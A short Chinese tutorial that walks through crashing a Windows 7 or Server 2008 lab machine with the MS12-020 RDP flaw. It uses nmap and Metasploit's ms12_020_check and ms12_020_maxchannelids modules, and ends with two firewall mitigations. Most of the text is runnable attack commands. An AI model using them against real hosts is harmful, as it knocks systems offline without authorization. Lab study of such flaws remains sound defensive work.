kali-蓝屏攻击(ms12-020)

一、MS12-020漏洞介绍

全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞

概要:MS12-020是一个针对远程桌面(RDP)协议的漏洞,其最严重的情况可能会造成远程执行代码,而通常情况下会造成对方蓝屏。

本教程给大家演示如何利用MS12-020漏洞实现死亡蓝屏攻击

二、环境准备

黑客方:kali Linux

受害者:Windows7或 Windows Server 2008

三、攻击过程复现

1、Nmap扫描受害者计算机是否开启3389端口

nmap -p 3389 + IP

2、打开kali终端,输入msfconsole

1

3、输入search ms12-020,这条指令是搜索ms12-020模块

2

下面那个auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块,我们先不看,先看下面的搜索模块

4、输入use auxiliary/scanner/rdp/ms12_020_check

5、然后我们show options一下

3

由于这个攻击需要靶机开启3389,所以我们的port默认是3389不要动,rhosts由于后面有s,所以很容易明白这可以设置成一个网段,也可以是一个ip,知道ip是更快的。为了更普遍,我们设成一个网段,这里时间较久,由于我的靶机是192.168.197.208 所以输入set RHOSTS 192.168.197.208/24 然后输入run或者exploit开始查找

4

我们可以看到它已经再开始查找了,我们发现192.168.0.143前面是绿色的+,这是开启的意思。

5

这时候我们就可以使用上面提到的auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块了

输入use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

然后set RHOST 192.168.197.208(也可以先show options)

最后run

6

观测2008靶机已经蓝屏了,重启就好了

7

# 四、防范措施

1、开启防火墙或者关闭3389端口

2、若需要用,就对防火墙配置策略,允许哪些IP才可以访问你RDP协议